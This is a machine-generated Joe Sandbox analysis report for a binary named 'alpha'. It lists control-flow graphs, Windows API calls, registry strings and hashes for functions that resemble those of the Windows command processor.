7ff6eb18f170-7ff6eb18f17b 455->462 463 7ff6eb18f15a-7ff6eb18f161 455->463 456->445 456->451 464 7ff6eb18f18e-7ff6eb18f198 457->464 465 7ff6eb18548c-7ff6eb1854ae GetLocaleInfoW 458->465 466 7ff6eb18f1c4-7ff6eb18f1ce 458->466 459->460 461 7ff6eb18f120-7ff6eb18f12b 459->461 460->453 461->454 461->460 462->457 463->462 468 7ff6eb18f163-7ff6eb18f16e 463->468 469 7ff6eb18f1b0-7ff6eb18f1bb 464->469 470 7ff6eb18f19a-7ff6eb18f1a1 464->470 471 7ff6eb18f207-7ff6eb18f20e 465->471 472 7ff6eb1854b4-7ff6eb1854f5 setlocale call 7ff6eb188f80 465->472 467 7ff6eb18f1d1-7ff6eb18f1db 466->467 473 7ff6eb18f1f3-7ff6eb18f1fe 467->473 474 7ff6eb18f1dd-7ff6eb18f1e4 467->474 468->455 468->462 469->466 470->469 476 7ff6eb18f1a3-7ff6eb18f1ae 470->476 475 7ff6eb18f211-7ff6eb18f21b 471->475 473->471 474->473 479 7ff6eb18f1e6-7ff6eb18f1f1 474->479 480 7ff6eb18f233-7ff6eb18f23e 475->480 481 7ff6eb18f21d-7ff6eb18f224 475->481 476->464 476->469 479->467 479->473 481->480 482 7ff6eb18f226-7ff6eb18f231 481->482 482->475 482->480
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: InfoLocale$DefaultLangUsersetlocale
                                              • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                              • API String ID: 2492766124-2236139042
                                              • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                              • Instruction ID: 9f93d3cdaa0d04ac4e673c104713fbf802711c6e3949f2bbf838eeefe345b540
                                              • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                              • Instruction Fuzzy Hash: 6DF14926B0868285EB118F11E5503F967A5FF0CBA8F944135CA4D977B4EF3EE909C70A
                                              Function 00007FF6EB184224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 483 7ff6eb184224-7ff6eb1842a5 InitializeProcThreadAttributeList 484 7ff6eb1842ab-7ff6eb1842e5 UpdateProcThreadAttribute 483->484 485 7ff6eb18ecd4-7ff6eb18ecee GetLastError call 7ff6eb199eec 483->485 486 7ff6eb18ecf0-7ff6eb18ed19 GetLastError call 7ff6eb199eec DeleteProcThreadAttributeList 484->486 487 7ff6eb1842eb-7ff6eb1843c6 memset * 2 GetStartupInfoW call 7ff6eb183a90 call 7ff6eb17b900 484->487 494 7ff6eb18ed1e 485->494 486->494 497 7ff6eb1843cc-7ff6eb1843d3 487->497 498 7ff6eb184638-7ff6eb184644 _local_unwind 487->498 499 7ff6eb184649-7ff6eb184650 497->499 500 7ff6eb1843d9-7ff6eb1843dc 497->500 498->499 499->500 503 7ff6eb184656-7ff6eb18465d 499->503 501 7ff6eb184415-7ff6eb184424 call 7ff6eb185a68 500->501 502 7ff6eb1843de-7ff6eb1843f5 wcsrchr 500->502 510 7ff6eb18442a-7ff6eb184486 CreateProcessW 501->510 511 7ff6eb184589-7ff6eb184590 501->511 502->501 504 7ff6eb1843f7-7ff6eb18440f lstrcmpW 502->504 503->501 506 7ff6eb184663 503->506 504->501 507 7ff6eb184668-7ff6eb18466d call 7ff6eb199044 504->507 506->500 507->501 513 7ff6eb18448b-7ff6eb18448f 510->513 511->510 514 7ff6eb184596-7ff6eb1845fa CreateProcessAsUserW 511->514 515 7ff6eb184495-7ff6eb1844c7 CloseHandle call 7ff6eb18498c 513->515 516 7ff6eb184672-7ff6eb184682 GetLastError 513->516 514->513 519 7ff6eb18468d-7ff6eb184694 515->519 520 7ff6eb1844cd-7ff6eb1844e5 515->520 516->519 521 7ff6eb184696-7ff6eb1846a0 519->521 522 7ff6eb1846a2-7ff6eb1846ac 519->522 523 7ff6eb1844eb-7ff6eb1844f2 520->523 524 7ff6eb1847a3-7ff6eb1847a9 520->524 521->522 525 7ff6eb1846ae-7ff6eb1846b5 call 7ff6eb1897bc 521->525 522->525 526 7ff6eb184705-7ff6eb184707 522->526 527 7ff6eb1844f8-7ff6eb184507 523->527 528 7ff6eb1845ff-7ff6eb184607 523->528 541 7ff6eb1846b7-7ff6eb184701 call 7ff6eb1cc038 525->541 542 7ff6eb184703 525->542 526->520 530 7ff6eb18470d-7ff6eb18472a call 7ff6eb17cd90 526->530 531 7ff6eb18450d-7ff6eb184512 call 7ff6eb185cb4 527->531 532 7ff6eb184612-7ff6eb184616 527->532 528->527 533 7ff6eb18460d 528->533 543 7ff6eb18473d-7ff6eb184767 call 7ff6eb1813e0 call 7ff6eb199eec call 7ff6eb17ff70 _local_unwind 530->543 544 7ff6eb18472c-7ff6eb184738 _local_unwind 530->544 547 7ff6eb184517-7ff6eb18455e call 7ff6eb1833f0 call 7ff6eb18498c 531->547 539 7ff6eb18461c-7ff6eb184633 532->539 540 7ff6eb1847d7-7ff6eb1847df 532->540 538 7ff6eb18476c-7ff6eb184773 533->538 538->527 548 7ff6eb184779-7ff6eb184780 538->548 545 7ff6eb1847f2-7ff6eb18483c call 7ff6eb17ff70 DeleteProcThreadAttributeList call 7ff6eb188f80 539->545 540->545 546 7ff6eb1847e1-7ff6eb1847ed CloseHandle 540->546 541->526 542->526 543->538 544->543 546->545 568 7ff6eb184564-7ff6eb184579 call 7ff6eb18498c 547->568 569 7ff6eb1847ae-7ff6eb1847ca call 7ff6eb1833f0 547->569 548->527 553 7ff6eb184786-7ff6eb184789 548->553 553->527 558 7ff6eb18478f-7ff6eb184792 553->558 558->524 562 7ff6eb184794-7ff6eb18479d call 7ff6eb19a250 558->562 562->524 562->527 568->545 576 7ff6eb18457f-7ff6eb184584 call 7ff6eb19a920 568->576 569->540 576->545
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                              • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                              • API String ID: 388421343-2905461000
                                              • Opcode ID: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
                                              • Instruction ID: 4ad3f9c0ac13b110fd7e09abc6a3adad261ad1423e8593938282a54c16109952
                                              • Opcode Fuzzy Hash: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
                                              • Instruction Fuzzy Hash: 2CF13B33A18B8286EA608B11E4547FAB7A5FB8D7A8F504135D94D83774DF3EE444CB0A
                                              Function 00007FF6EB185554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 579 7ff6eb185554-7ff6eb1855b9 call 7ff6eb18a640 582 7ff6eb1855bc-7ff6eb1855e8 RegOpenKeyExW 579->582 583 7ff6eb185887-7ff6eb18588e 582->583 584 7ff6eb1855ee-7ff6eb185631 RegQueryValueExW 582->584 583->582 587 7ff6eb185894-7ff6eb1858db time srand call 7ff6eb188f80 583->587 585 7ff6eb185637-7ff6eb185675 RegQueryValueExW 584->585 586 7ff6eb18f248-7ff6eb18f24d 584->586 588 7ff6eb185677-7ff6eb18567c 585->588 589 7ff6eb18568e-7ff6eb1856cc RegQueryValueExW 585->589 591 7ff6eb18f24f-7ff6eb18f25b 586->591 592 7ff6eb18f260-7ff6eb18f265 586->592 593 7ff6eb185682-7ff6eb185687 588->593 594 7ff6eb18f28b-7ff6eb18f290 588->594 595 7ff6eb18f2b6-7ff6eb18f2bb 589->595 596 7ff6eb1856d2-7ff6eb185710 RegQueryValueExW 589->596 591->585 592->585 598 7ff6eb18f26b-7ff6eb18f286 _wtol 592->598 593->589 594->589 603 7ff6eb18f296-7ff6eb18f2b1 _wtol 594->603 599 7ff6eb18f2ce-7ff6eb18f2d3 595->599 600 7ff6eb18f2bd-7ff6eb18f2c9 595->600 601 7ff6eb185729-7ff6eb185767 RegQueryValueExW 596->601 602 7ff6eb185712-7ff6eb185717 596->602 598->585 599->596 604 7ff6eb18f2d9-7ff6eb18f2f4 _wtol 599->604 600->596 607 7ff6eb185769-7ff6eb18576e 601->607 608 7ff6eb18579f-7ff6eb1857dd RegQueryValueExW 601->608 605 7ff6eb18571d-7ff6eb185722 602->605 606 7ff6eb18f2f9-7ff6eb18f2fe 602->606 603->589 604->596 605->601 606->601 609 7ff6eb18f304-7ff6eb18f31a wcstol 606->609 610 7ff6eb18f320-7ff6eb18f325 607->610 611 7ff6eb185774-7ff6eb18578f 607->611 612 7ff6eb1857e3-7ff6eb1857e8 608->612 613 7ff6eb18f3a9 608->613 609->610 614 7ff6eb18f327-7ff6eb18f33f wcstol 610->614 615 7ff6eb18f34b 610->615 616 7ff6eb185795-7ff6eb185799 611->616 617 7ff6eb18f357-7ff6eb18f35e 611->617 618 7ff6eb18f363-7ff6eb18f368 612->618 619 7ff6eb1857ee-7ff6eb185809 612->619 620 7ff6eb18f3b5-7ff6eb18f3b8 613->620 614->615 615->617 616->608 616->617 617->608 621 7ff6eb18f38e 618->621 622 7ff6eb18f36a-7ff6eb18f382 wcstol 618->622 623 7ff6eb18f39a-7ff6eb18f39d 619->623 624 7ff6eb18580f-7ff6eb185813 619->624 626 7ff6eb18f3be-7ff6eb18f3c5 620->626 627 7ff6eb18582c 620->627 621->623 622->621 623->613 624->623 625 7ff6eb185819-7ff6eb185823 624->625 625->620 628 7ff6eb185829 625->628 629 7ff6eb185832-7ff6eb185870 RegQueryValueExW 626->629 627->629 630 7ff6eb18f3ca-7ff6eb18f3d1 627->630 628->627 631 7ff6eb185876-7ff6eb185882 RegCloseKey 629->631 632 7ff6eb18f3dd-7ff6eb18f3e2 629->632 630->632 631->583 633 7ff6eb18f433-7ff6eb18f439 632->633 634 7ff6eb18f3e4-7ff6eb18f412 ExpandEnvironmentStringsW 632->634 633->631 635 7ff6eb18f43f-7ff6eb18f44c call 7ff6eb17b900 633->635 636 7ff6eb18f414-7ff6eb18f426 call 7ff6eb1813e0 634->636 637 7ff6eb18f428 634->637 635->631 640 7ff6eb18f42e 636->640 637->640 640->633
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: QueryValue$CloseOpensrandtime
                                              • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                              • API String ID: 145004033-3846321370
                                              • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                              • Instruction ID: 804a82e11a3a57b63e2b8e46cdfa143d765c95b8275fbbdf4a37b91cc345e655
                                              • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                              • Instruction Fuzzy Hash: F1E1533351DA82C6E7508B10E4507FAB7A0FB8D768F405535E98E82A78DF7EE548CB06
                                              Function 00007FF6EB1837D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 821 7ff6eb1837d8-7ff6eb183887 GetCurrentThreadId OpenThread call 7ff6eb1804f4 HeapSetInformation RegOpenKeyExW 824 7ff6eb18388d-7ff6eb1838eb call 7ff6eb185920 GetConsoleOutputCP GetCPInfo 821->824 825 7ff6eb18e9f8-7ff6eb18ea3b RegQueryValueExW RegCloseKey 821->825 828 7ff6eb18ea41-7ff6eb18ea59 GetThreadLocale 824->828 829 7ff6eb1838f1-7ff6eb183913 memset 824->829 825->828 830 7ff6eb18ea74-7ff6eb18ea77 828->830 831 7ff6eb18ea5b-7ff6eb18ea67 828->831 832 7ff6eb183919-7ff6eb183935 call 7ff6eb184d5c 829->832 833 7ff6eb18eaa5 829->833 834 7ff6eb18ea94-7ff6eb18ea96 830->834 835 7ff6eb18ea79-7ff6eb18ea7d 830->835 831->830 842 7ff6eb18393b-7ff6eb183942 832->842 843 7ff6eb18eae2-7ff6eb18eaff call 7ff6eb173240 call 7ff6eb198530 call 7ff6eb184c1c 832->843 836 7ff6eb18eaa8-7ff6eb18eab4 833->836 834->833 835->834 838 7ff6eb18ea7f-7ff6eb18ea89 835->838 836->832 839 7ff6eb18eaba-7ff6eb18eac3 836->839 838->834 841 7ff6eb18eacb-7ff6eb18eace 839->841 846 7ff6eb18ead0-7ff6eb18eadb 841->846 847 7ff6eb18eac5-7ff6eb18eac9 841->847 844 7ff6eb183948-7ff6eb183962 _setjmp 842->844 845 7ff6eb18eb27-7ff6eb18eb40 _setjmp 842->845 849 7ff6eb18eb00-7ff6eb18eb0d 843->849 844->849 850 7ff6eb183968-7ff6eb18396d 844->850 851 7ff6eb18eb46-7ff6eb18eb49 845->851 852 7ff6eb1839fe-7ff6eb183a05 call 7ff6eb184c1c 845->852 846->836 853 7ff6eb18eadd 846->853 847->841 862 7ff6eb18eb15-7ff6eb18eb1f call 7ff6eb184c1c 849->862 855 7ff6eb1839b9-7ff6eb1839bb 850->855 856 7ff6eb18396f 850->856 858 7ff6eb18eb66-7ff6eb18eb6f call 7ff6eb1801b8 851->858 859 7ff6eb18eb4b-7ff6eb18eb65 call 7ff6eb173240 call 7ff6eb198530 call 7ff6eb184c1c 851->859 852->825 853->832 866 7ff6eb18eb20 855->866 867 7ff6eb1839c1-7ff6eb1839c3 call 7ff6eb184c1c 855->867 863 7ff6eb183972-7ff6eb18397d 856->863 877 7ff6eb18eb71-7ff6eb18eb82 _setmode 858->877 878 7ff6eb18eb87-7ff6eb18eb89 call 7ff6eb1886f0 858->878 859->858 862->866 871 7ff6eb1839c9-7ff6eb1839de call 7ff6eb17df60 863->871 872 7ff6eb18397f-7ff6eb183984 863->872 866->845 882 7ff6eb1839c8 867->882 871->862 888 7ff6eb1839e4-7ff6eb1839e8 871->888 872->863 880 7ff6eb183986-7ff6eb1839ae call 7ff6eb180580 GetConsoleOutputCP GetCPInfo call 7ff6eb1804f4 872->880 877->878 889 7ff6eb18eb8e-7ff6eb18ebad call 7ff6eb1858e4 call 7ff6eb17df60 878->889 898 7ff6eb1839b3 880->898 882->871 888->852 892 7ff6eb1839ea-7ff6eb1839ef call 7ff6eb17be00 888->892 902 7ff6eb18ebaf-7ff6eb18ebb3 889->902 899 7ff6eb1839f4-7ff6eb1839fc 892->899 898->855 899->872 902->852 903 7ff6eb18ebb9-7ff6eb18ec24 call 7ff6eb1858e4 GetConsoleOutputCP GetCPInfo call 7ff6eb1804f4 call 7ff6eb17be00 call 7ff6eb180580 GetConsoleOutputCP GetCPInfo call 7ff6eb1804f4 902->903 903->889
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                              • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                              • API String ID: 2624720099-1920437939
                                              • Opcode ID: f14ccfe17658d03b7f0c6aedd8572f1845147b0a0877a5eeff18d3955b8dfa43
                                              • Instruction ID: 5c9f5a0bed28deaf2e3436219264cc06f65e2a9f46ce897129fd31c0024e6186
                                              • Opcode Fuzzy Hash: f14ccfe17658d03b7f0c6aedd8572f1845147b0a0877a5eeff18d3955b8dfa43
                                              • Instruction Fuzzy Hash: DBC1CE33E086428AF7149B64A4403F9AAA0FF4E77CF544138DA0ED67B5DF3EA045870A
                                              Function 00007FF6EB18823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1118 7ff6eb18823c-7ff6eb18829b FindFirstFileExW 1119 7ff6eb1882cd-7ff6eb1882df 1118->1119 1120 7ff6eb18829d-7ff6eb1882a9 GetLastError 1118->1120 1124 7ff6eb188365-7ff6eb18837b FindNextFileW 1119->1124 1125 7ff6eb1882e5-7ff6eb1882ee 1119->1125 1121 7ff6eb1882af 1120->1121 1122 7ff6eb1882b1-7ff6eb1882cb 1121->1122 1126 7ff6eb1883d0-7ff6eb1883e5 FindClose 1124->1126 1127 7ff6eb18837d-7ff6eb188380 1124->1127 1128 7ff6eb1882f1-7ff6eb1882f4 1125->1128 1126->1128 1127->1119 1129 7ff6eb188386 1127->1129 1130 7ff6eb1882f6-7ff6eb188300 1128->1130 1131 7ff6eb188329-7ff6eb18832b 1128->1131 1129->1120 1132 7ff6eb188332-7ff6eb188353 GetProcessHeap HeapAlloc 1130->1132 1133 7ff6eb188302-7ff6eb18830e 1130->1133 1131->1121 1134 7ff6eb18832d 1131->1134 1135 7ff6eb188356-7ff6eb188363 1132->1135 1136 7ff6eb188310-7ff6eb188313 1133->1136 1137 7ff6eb18838b-7ff6eb1883c2 GetProcessHeap HeapReAlloc 1133->1137 1134->1120 1135->1136 1140 7ff6eb188315-7ff6eb188323 1136->1140 1141 7ff6eb188327 1136->1141 1138 7ff6eb1950f8-7ff6eb19511e GetLastError FindClose 1137->1138 1139 7ff6eb1883c8-7ff6eb1883ce 1137->1139 1138->1122 1139->1135 1140->1141 1141->1131
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ErrorFileFindFirstLast
                                              • String ID:
                                              • API String ID: 873889042-0
                                              • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                              • Instruction ID: f2e18aa780218ef2bef07233d1816177fa75ab7f6153ea080f5e5b057b46c579
                                              • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                              • Instruction Fuzzy Hash: 10511B37A09B42C6E7118B11E5543B9BBA1FB4DBA9F448131CA1D83364DF3EE5548B09
                                              Function 00007FF6EB182978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1142 7ff6eb182978-7ff6eb1829b6 1143 7ff6eb1829b9-7ff6eb1829c1 1142->1143 1143->1143 1144 7ff6eb1829c3-7ff6eb1829c5 1143->1144 1145 7ff6eb1829cb-7ff6eb1829cf 1144->1145 1146 7ff6eb18e441 1144->1146 1147 7ff6eb1829d2-7ff6eb1829da 1145->1147 1148 7ff6eb1829dc-7ff6eb1829e1 1147->1148 1149 7ff6eb182a1e-7ff6eb182a3e FindFirstFileW 1147->1149 1148->1149 1150 7ff6eb1829e3-7ff6eb1829eb 1148->1150 1151 7ff6eb18e435-7ff6eb18e439 1149->1151 1152 7ff6eb182a44-7ff6eb182a5c FindClose 1149->1152 1150->1147 1153 7ff6eb1829ed-7ff6eb182a1c call 7ff6eb188f80 1150->1153 1151->1146 1154 7ff6eb182ae3-7ff6eb182ae5 1152->1154 1155 7ff6eb182a62-7ff6eb182a6e 1152->1155 1156 7ff6eb182aeb-7ff6eb182b10 _wcsnicmp 1154->1156 1157 7ff6eb18e3f7-7ff6eb18e3ff 1154->1157 1159 7ff6eb182a70-7ff6eb182a78 1155->1159 1156->1155 1160 7ff6eb182b16-7ff6eb18e3f1 _wcsicmp 1156->1160 1159->1159 1162 7ff6eb182a7a-7ff6eb182a8d 1159->1162 1160->1155 1160->1157 1162->1146 1164 7ff6eb182a93-7ff6eb182a97 1162->1164 1165 7ff6eb182a9d-7ff6eb182ade memmove call 7ff6eb1813e0 1164->1165 1166 7ff6eb18e404-7ff6eb18e407 1164->1166 1165->1150 1167 7ff6eb18e40b-7ff6eb18e413 1166->1167 1167->1167 1170 7ff6eb18e415-7ff6eb18e42b memmove 1167->1170 1170->1151
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                              • Instruction ID: 43d2ec2131d2609cb4a9e66e2dae60f1f3be5f04f302d49f8b5fba9d193fb70c
                                              • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                              • Instruction Fuzzy Hash: BE51F863F0868285EA308F15A5443FAA690FB58BB8F484231DE6E876F4DF3DE4458646
                                              Function 00007FF6EB184D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 643 7ff6eb184d5c-7ff6eb184e4b InitializeCriticalSection call 7ff6eb1858e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff6eb180580 call 7ff6eb184a14 call 7ff6eb184ad0 call 7ff6eb185554 GetCommandLineW 654 7ff6eb184e4d-7ff6eb184e54 643->654 654->654 655 7ff6eb184e56-7ff6eb184e61 654->655 656 7ff6eb184e67-7ff6eb184e7b call 7ff6eb182e44 655->656 657 7ff6eb1851cf-7ff6eb1851e3 call 7ff6eb173278 call 7ff6eb184c1c 655->657 662 7ff6eb1851ba-7ff6eb1851ce call 7ff6eb173278 call 7ff6eb184c1c 656->662 663 7ff6eb184e81-7ff6eb184ec3 GetCommandLineW call 7ff6eb1813e0 call 7ff6eb17ca40 656->663 662->657 663->662 674 7ff6eb184ec9-7ff6eb184ee8 call 7ff6eb18417c call 7ff6eb182394 663->674 678 7ff6eb184eed-7ff6eb184ef5 674->678 678->678 679 7ff6eb184ef7-7ff6eb184f1f call 7ff6eb17aa54 678->679 682 7ff6eb184f95-7ff6eb184fee GetConsoleOutputCP GetCPInfo call 7ff6eb1851ec GetProcessHeap HeapAlloc 679->682 683 7ff6eb184f21-7ff6eb184f30 679->683 689 7ff6eb185012-7ff6eb185018 682->689 690 7ff6eb184ff0-7ff6eb185006 GetConsoleTitleW 682->690 683->682 684 7ff6eb184f32-7ff6eb184f39 683->684 684->682 686 7ff6eb184f3b-7ff6eb184f77 call 7ff6eb173278 GetWindowsDirectoryW 684->686 695 7ff6eb184f7d-7ff6eb184f90 call 7ff6eb183c24 686->695 696 7ff6eb1851b1-7ff6eb1851b9 call 7ff6eb184c1c 686->696 693 7ff6eb18507a-7ff6eb18507e 689->693 694 7ff6eb18501a-7ff6eb185024 call 7ff6eb183578 689->694 690->689 692 7ff6eb185008-7ff6eb18500f 690->692 692->689 697 7ff6eb1850eb-7ff6eb185161 GetModuleHandleW GetProcAddress * 3 693->697 698 7ff6eb185080-7ff6eb1850b3 call 7ff6eb19b89c call 7ff6eb17586c call 7ff6eb173240 call 7ff6eb183448 693->698 694->693 706 7ff6eb185026-7ff6eb185030 694->706 695->682 696->662 704 7ff6eb185163-7ff6eb185167 697->704 705 7ff6eb18516f 697->705 724 7ff6eb1850b5-7ff6eb1850d0 call 7ff6eb183448 * 2 698->724 725 7ff6eb1850d2-7ff6eb1850d7 call 7ff6eb173278 698->725 